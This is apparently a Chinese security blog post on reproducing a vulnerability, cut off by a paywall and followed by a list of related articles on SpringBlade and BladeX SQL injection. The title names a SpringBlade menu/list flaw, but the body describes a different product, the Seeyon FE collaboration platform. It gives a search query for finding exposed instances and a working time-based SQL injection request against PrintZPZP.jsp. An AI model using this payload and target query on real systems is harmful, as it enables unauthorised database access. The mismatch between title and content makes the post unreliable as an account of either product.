【漏洞复现】SpringBlade menu/list SQL注入漏洞

原创 已于 2024-10-12 22:37:33 修改 · 1.1k 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库

于 2024-10-12 22:35:22 首次发布


》》》产品描述《《《

        致远互联智能协同是一个信息窗口与工作界面,进行所有信息的分类组合和聚合推送呈现。通过面向角色化、业务化、多终端的多维信息空间设计,为不同组织提供协同门户,打破组织内信息壁垒,构建统一协同沟通的平台。

》》》漏洞描述《《《

        致远互联 FE协作办公平台 PrintZPzP,jsp 存在一个 SQL 注入Q漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性,

》》》搜索语句《《《

title="FE协作办公平台" || body="li_plugins_download"

》》》漏洞复现《《《

POC

GET /kp/PrintZPZP.jsp?zpshqid=1';WAITFOR+DELAY+'0:0:5'--  HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; SE 2.X MetaSr 1.0)
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
最低0.47元/天 解锁文章

200万优质内容无限畅学
A 八方
关注
BladeX企业级开发平台 error/list SQL 注入漏洞复现
0xSec
03-12 1647
BladeX企业级开发平台 /api/blade-log/error/list路径存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
SpringBlade export-user SQL 注入漏洞
holyxp的博客
01-10 1273
SpringBlade 是一个由商业级项目升级优化而来的 SprinaCloud 分布式微服务架构、Springoot 单体式微服务架构并存的综合型项四。SpringBlade v3.2.0 及之前版本框架后台 export-user 路径存在安全漏洞Q,攻击者利用该漏洞可通过组件customSalSegment 进行SQL注入攻击,攻击者可将用户名、密码等敏感信息通过 excel 导出。
漏洞复现-SpringBlade export-user SQL 注入漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-21 1255
漏洞复现-SpringBlade export-user SQL 注入漏洞,附带自己写的poc脚本
漏洞复现SpringBlade error_list SQL 注入漏洞
https://blog.echo234.cn/
03-26 959
SpringBlade 是一个由商业级项目升级优化而来的 SpringCloud 分布式微服务架构、SpringBoot 单体式微服务架构并存的综合型项目。框架后台/api/blade-log/error/list路径存在安全漏洞,攻击者利用该漏洞进行SQL注入攻击。
复现SpringBlade SQL 注入漏洞_22
fushuang333的博客
01-18 2888
复现SpringBlade SQL 注入漏洞SpringBlade 是由一个商业级项目升级优化而来的SpringCloud微服务架构,采用Java8 API重构了业务代码,完全遵循阿里巴巴编码规范。
漏洞复现SpringBlade dict-biz SQL注入漏洞
qq_67810151的博客
04-22 1047
SpringBlade dict-biz接口存在SQL注入漏洞。未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
BladeX企业级开发平台 tenant/list SQL 注入漏洞复现( CVE-2024-33332)
0xSec
05-31 1463
BladeX企业级开发平台 /api/blade-system/tenant/list 路径存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
SpringBlade 后台框架 /api/blade-system/dict-biz/list 存在SQL注入漏洞
wan___she__pi的博客
04-22 1114
SpringBlade 是一个由商业级项目升级优化而来的 SpringCloud 分布式微服务架构,采用Spring Boot 2.5 、Spring Cloud 2020 等核心技术构建。SpringBlade 后台框架 /api/blade-system/dict-biz/list 路径存在SQL注入漏洞
springblade站点SQL注入实战案例waf绕过
问彡心的博客
07-07 1318
记录指纹为springblade的后台接口存在sql注入的站点,进行云锁waf绕过的真实案例
BladeX企业级开发平台 menu/list SQL 注入漏洞复现
0xSec
07-24 574
BladeX企业级开发平台 menu/list 存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复现SpringBlade export-user接口SQL注入漏洞
李火火的安全圈
01-22 1722
SpringBlade 是一个由商业级项目升级优化而来的微服务架构 采用Spring Boot 2.7 、Spring Cloud 2021 等核心技术构建,完全遵循阿里巴巴编码规范。提供基于React和Vue的两个前端框架用于快速搭建企业级的SaaS多租户微服务平台。
BladeX企业级开发平台 dict-biz/list SQL 注入漏洞复现
0xSec
04-16 1980
BladeX企业级开发平台/api/blade-system/dict-biz/list 路径存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
SpringBlade dict-biz/list 接口 SQL 注入漏洞
为了低调的博客
09-15 851
SpringBlade 框架中,如果接口的后台处理逻辑没有正确地对用户输入进行过滤或参数化查询(Prepared Statements),那么可能会存在 SQL 注入漏洞SQL 注入是一种安全漏洞,攻击者可以利用它向应用程序的数据库查询中插入或“注入”恶意的 SQL 代码片段。
SpringBlade多处SQL注入漏洞
yxr520yj的博客
01-06 405
【代码】SpringBlade多处SQL注入漏洞
针对spring二次开发的BladeX站点的渗透测试
2401_83799022的博客
09-20 1175
这篇文章呢,主要是我在微信公众号通过关注的一些大牛子师傅发的公众号,文章写的关于spring-blade后台框架系统的menu接口存在的1day漏洞,一些sql注入和未授权漏洞等,然后写了相关魔改后的blade的漏洞的打法,对blade比较感兴趣的我,也就开始踏上了blade漏洞挖掘的不归之路了!这篇文章到这里就结束了,文章的思路写的很清晰,新手师傅们应该也是很有帮助的一篇文章了,这篇文章开始写的信息收集,针对于blade站点来讲很有帮助的,感兴趣blade站点的师傅们也是可以跟着我的思路去打一波。
HW漏洞威胁情报第一天|HW情报
weixin_43167326的博客
07-24 573
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!蓝凌EKP存在sys_ui_component远程命令执行漏洞亿赛通数据泄露防护(DLP)系统NoticeAjax接口存在SQL注入漏洞天问物业ERP系统AreaAvatarDownLoad存在任意文件读取漏洞
SQL盲注、SQL注入 - SpringBoot配置SQL注入过滤器
C3Stones
09-17 2683
1. SQL盲注、SQL注入   风险:可能会查看、修改或删除数据库条目和表。原因: 未对用户输入正确执行危险字符清理。固定值: 查看危险字符注入的可能解决方案。 2. pom.xml添加依赖 <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spr...
【赵渝强老师】达梦数据库的DMSQL
最新发布
赵渝强老师优快云博客主页
08-04 324
存储过程和存储函数在功能上相当于客户端的一段SQL批处理程序,但是在许多方面有着后者无法比拟的优点,它为用户提供了一种高效率的编程手段,成为现代数据库系统的重要特征。可以认为这种技术是执行DMSQL程序的一种机器,它可以接受任何有效的DMSQL程序,按照语言本身所规定的语义执行,并将结果返回给客户。DMSQL程序可以分为存储模块和客户端DMSQL程序两类。在DMSQL程序中,包括一整套数据类型、条件结构、循环结构和异常处理结构等,DMSQL程序中可以执行SQL语句,SQL语句中也可以使用DMSQL函数。
SQL中的WITH语句(公共表表达式CTE)解释
zik的博客
07-31 275
SQL中的WITH语句(公共表表达式CTE)是一种创建临时结果集的强大功能,可提高复杂查询的可读性。基本语法允许定义临时表(CTE),在当前查询中引用。CTE支持递归查询(WITH RECURSIVE),适合处理层次结构数据。主要用途包括简化复杂查询、替代子查询以及执行递归操作。相比子查询,CTE使代码更清晰,且支持同一查询中多次引用。虽然CTE只在当前查询有效,但它能显著提升SQL语句的组织性和维护性,是处理重复计算和递归数据结构的理想工具。
命令行SQL注入漏洞挖掘工具sqlifuzzer介绍
2. SQL注入的检测方法:要检测Web应用程序中是否存在SQL注入漏洞,安全人员通常会使用各种自动化或手动的工具,比如sqlifuzzer,它能通过向Web应用发送包含SQL代码的输入数据来测试是否能够获得预期外的响应,以此来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值